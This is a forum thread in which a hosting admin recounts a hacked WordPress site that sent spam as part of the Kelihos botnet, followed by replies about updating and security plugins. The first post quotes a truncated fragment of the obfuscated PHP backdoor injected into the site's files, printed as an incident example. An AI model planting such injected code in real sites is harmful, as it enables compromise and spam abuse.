• Announcements

    • zero

      Forum Updated   11/03/2015

      We just updated the forums. Among other things, selective quote is now live. You can just select the text that you want, and a option to "quote this" will appear. During the update we also broke the main theme files for some reason.  I just activated the backup theme files and dumped the custom CSS in (I'll clean it up later). If there are any issues with the site, please get in touch with @nytegeek or myself.
Sign in to follow this  
Followers 0
zero

Keep your WordPress updated or you will be a victim

8 posts in this topic

We first noticed something was a miss when we kept receiving alerts of disk io going through the roof. I guess I was sloppy in finding out the root cause, I just took it that some guy was going batshit crazy and running a lot of backups. I didn't bother much because if he screwed around too much, LVE would kick in and deal with it.

A few days later I received an email from another user complaining that he could not send any emails to Hotmail. Error message showed that our IP was blocked. I did some digging and found that the server was listed in the Composite Block List (CBL).

IP Address 10.xx.xx.xx is listed in the CBL. It shows signs of being infected with a spam sending trojan, malicious link or some other form of botnet.

It was last detected at 2015-10-07 22:00 GMT (+/- 30 minutes), approximately 7 days, 10 hours, 59 minutes ago.

This IP is infected (or NATting for a computer that is infected) with the kelihos spambot. In other words, it's participating in a botnet.

Well... Fuck.

More on Kelihos here.

Looking through the mail queue gave us the answer as to which site was compromised. Question was, how was the site compromised? After checking each individual site, the issue was isolated to only one website. Some obfuscated code was present in each .php file on the hacked site. Something that looked like the below:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>

According to http://security.stackexchange.com/questions/70579/is-this-a-backdoor, the code allows the attacker to append any HTML or Javascript. By this time, I have no idea how many spam mails were sent but there were about 15,000 emails still stuck in the mail queue.

This proved to be a very expensive lesson for the site owner. He was running an outdated version of WordPress with a custom made cart plugin. I suspect that the plugin was the source of the vulnerability. The site owner was not willing to spend money on a service like Securi to get his site fixed and he did not have backups. The only option left was to shut his site down.

Key takeaways:

  1. Keep your site updated.
  2. Have lots of backups.
  3. Try and stay away from custom plugins unless you're very sure they are secure.
Edited by zero
0

Share this post


Link to post
Share on other sites

I know WordPress is more popular than blogspot these days because of its many features.  Who would have thought that forgetting a simple step of not updating can cause such vulnerabilities. I think some people don't update because there are times when updates were kind of undesirable. Most people are not comfortable with change and many updates puts them out of their comfort zones. I still remember how mad I was when YouTube remove my favorite features because of an update.  That is one reason why people don't update. Another one would be laziness and lack of patience. 

Those annoying bots really makes me mad because they don't care if what they do is illegal. All their care about is to get profit from people who are gullible enough to click their traps. So now they hack sites to spread their spamming terror.

0

Share this post


Link to post
Share on other sites

I currently use the plugin Wordfence security. Does anybody know whether or not this plugin is beneficial or if its a simple gimmick. I always believed the site was safe with it running but all these hacks have gotten me slightly nervous.

0

Share this post


Link to post
Share on other sites

I only use wordpress in other programs. Do I need to update it in the other programs or will they do it for me usually? How would I do that anyway? I'm a total beginner when it comes to wordpress.

0

Share this post


Link to post
Share on other sites

I only use wordpress in other programs. Do I need to update it in the other programs or will they do it for me usually? How would I do that anyway? I'm a total beginner when it comes to wordpress.

It doesn't apply to you unless you are maintaining a site utilizing wordpress.

0

Share this post


Link to post
Share on other sites

I currently use the plugin Wordfence security. Does anybody know whether or not this plugin is beneficial or if its a simple gimmick. I always believed the site was safe with it running but all these hacks have gotten me slightly nervous.

I don't think the free version of WordFence helps you block such attacks. It's useful if you need to run a scan on your WordPress site. It basically compares your PHP files with the default WordPress files and asks you if you want to restore to the original. You can also compare both files and see what was changed. However, the goal is to prevent such issues from happening and I doubt there's a free plugin that does that.

0

Share this post


Link to post
Share on other sites
On 11/3/2015, 12:47:14, nytegeek said:

It doesn't apply to you unless you are maintaining a site utilizing wordpress.

Ok so I don't have to worry about it then. That's a relief. I had no idea how I was going to update my site when it wasn't directly through Wordpress. Thanks for the info.

0

Share this post


Link to post
Share on other sites
On 11/3/2015, 6:25:50, zero said:

I don't think the free version of WordFence helps you block such attacks. It's useful if you need to run a scan on your WordPress site. It basically compares your PHP files with the default WordPress files and asks you if you want to restore to the original. You can also compare both files and see what was changed. However, the goal is to prevent such issues from happening and I doubt there's a free plugin that does that.

Can anyone recommend to me a plugin (paid) that would help secure my wordpress site? I just need to make sure my online store side of the website does not get compromised. Thank You

0

Share this post


Link to post
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
Followers 0

  • Recently Browsing   0 members

    No registered users viewing this page.

  • Who's Online   0 Members, 0 Anonymous, 5 Guests (See full list)

    There are no registered users currently online